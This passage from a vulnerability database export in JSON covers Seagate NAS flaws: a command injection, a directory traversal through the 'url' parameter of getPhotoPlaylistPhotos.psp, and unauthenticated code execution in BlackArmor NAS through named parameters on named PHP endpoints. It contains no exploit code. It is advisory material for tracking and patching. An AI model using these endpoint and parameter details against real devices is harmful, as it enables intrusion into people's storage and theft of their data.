{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "VULMON",
"id": "CVE-2018-5347"
},
{
"db": "PACKETSTORM",
"id": "145932"
}
],
"trust": 2.43
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-135378",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43659",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "VULMON",
"id": "CVE-2018-5347"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-5347",
"trust": 3.3
},
{
"db": "EXPLOIT-DB",
"id": "43659",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-04347",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "145932",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-97283",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-135378",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-5347",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "VULMON",
"id": "CVE-2018-5347"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "PACKETSTORM",
"id": "145932"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
},
{
"db": "NVD",
"id": "CVE-2018-5347"
}
]
},
"id": "VAR-201801-1503",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "VULHUB",
"id": "VHN-135378"
}
],
"trust": 1.2999999999999998
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
}
]
},
"last_update_date": "2024-11-23T22:52:13.364000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Personal Cloud",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/consumer/backup/personal-cloud/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "NVD",
"id": "CVE-2018-5347"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.2,
"url": "https://blogs.securiteam.com/index.php/archives/3548"
},
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/43659/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5347"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5347"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "VULMON",
"id": "CVE-2018-5347"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "PACKETSTORM",
"id": "145932"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
},
{
"db": "NVD",
"id": "CVE-2018-5347"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-04347",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-135378",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-5347",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "145932",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-5347",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04347",
"ident": null
},
{
"date": "2018-01-12T00:00:00",
"db": "VULHUB",
"id": "VHN-135378",
"ident": null
},
{
"date": "2018-01-12T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5347",
"ident": null
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001653",
"ident": null
},
{
"date": "2018-01-16T18:02:22",
"db": "PACKETSTORM",
"id": "145932",
"ident": null
},
{
"date": "2018-01-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-562",
"ident": null
},
{
"date": "2018-01-12T01:29:00.200000",
"db": "NVD",
"id": "CVE-2018-5347",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04347",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-135378",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5347",
"ident": null
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001653",
"ident": null
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-562",
"ident": null
},
{
"date": "2024-11-21T04:08:37.910000",
"db": "NVD",
"id": "CVE-2018-5347",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Seagate Personal Cloud Seagate Media Server Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
}
],
"trust": 1.2
},
"type": {
"_id": null,
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
}
],
"trust": 0.6
}
}
VAR-201804-0530
Vulnerability from variot - Updated: 2024-11-23 22:26Seagate Media Server in Seagate Personal Cloud before 4.3.18.4 has directory traversal in getPhotoPlaylistPhotos.psp via a parameter named url. SeagateMediaServer is one of the media servers. SeagatePersonalCloud 4.3.1. An attacker could exploit this vulnerability to retrieve sensitive information from the NAS using the \342\200\230url\342\200\231 parameter
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201804-0530",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "personal cloud",
"scope": "lt",
"trust": 1.8,
"vendor": "seagate",
"version": "4.3.18.4"
},
{
"model": "technology seagate personal cloud",
"scope": "lt",
"trust": 0.6,
"vendor": "seagate",
"version": "4.3.18.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:personal_cloud_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
}
]
},
"cve": "CVE-2017-18263",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-18263",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09564",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18263",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18263",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-18263",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-09564",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-069",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Media Server in Seagate Personal Cloud before 4.3.18.4 has directory traversal in getPhotoPlaylistPhotos.psp via a parameter named url. SeagateMediaServer is one of the media servers. SeagatePersonalCloud 4.3.1. An attacker could exploit this vulnerability to retrieve sensitive information from the NAS using the \\342\\200\\230url\\342\\200\\231 parameter",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNVD",
"id": "CNVD-2018-09564"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "147274",
"trust": 3.0
},
{
"db": "NVD",
"id": "CVE-2017-18263",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-09564",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"id": "VAR-201804-0530",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
}
],
"trust": 1.18333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
}
]
},
"last_update_date": "2024-11-23T22:26:25.388000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Personal Cloud",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/support/network-attached-storage/home-network/personal-cloud/"
},
{
"title": "SeagatePersonalCloudSeagateMediaServer path traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/129159"
},
{
"title": "Seagate Personal Cloud Seagate Media Server Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79807"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://packetstormsecurity.com/files/147274/seagate-media-server-path-traversal.html"
},
{
"trust": 1.6,
"url": "https://sumofpwn.nl/advisory/2017/seagate-media-server-path-traversal-vulnerability.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18263"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18263"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"date": "2018-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"date": "2018-05-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"date": "2018-04-28T01:29:01.453000",
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"date": "2018-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004529"
},
{
"date": "2018-05-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-069"
},
{
"date": "2024-11-21T03:19:43",
"db": "NVD",
"id": "CVE-2017-18263"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Personal Cloud Seagate Media Server Path Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09564"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-069"
}
],
"trust": 0.6
}
}
VAR-201802-0135
Vulnerability from variot - Updated: 2024-11-23 22:07Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Seagate BlackArmor NAS Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The SeagateBlackArmorNAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. There is a security hole in SeagateBlackArmorNAS. A security flaw exists in Seagate BlackArmor NAS
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201802-0135",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": null
},
{
"model": "blackarmor nas 110",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": null
},
{
"model": "blackarmor nas 110",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "blackarmor nas 220",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "technology llc blackarmor nas",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:blackarmor_nas_110_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
}
]
},
"cve": "CVE-2014-3206",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-3206",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-05856",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-71145",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-3206",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-3206",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2014-3206",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-05856",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201802-608",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-71145",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-3206",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Seagate BlackArmor NAS Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The SeagateBlackArmorNAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. There is a security hole in SeagateBlackArmorNAS. A security flaw exists in Seagate BlackArmor NAS",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3206"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "VULMON",
"id": "CVE-2014-3206"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3206",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "33159",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-05856",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-71145",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-3206",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"id": "VAR-201802-0135",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
}
],
"trust": 1.54343433
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
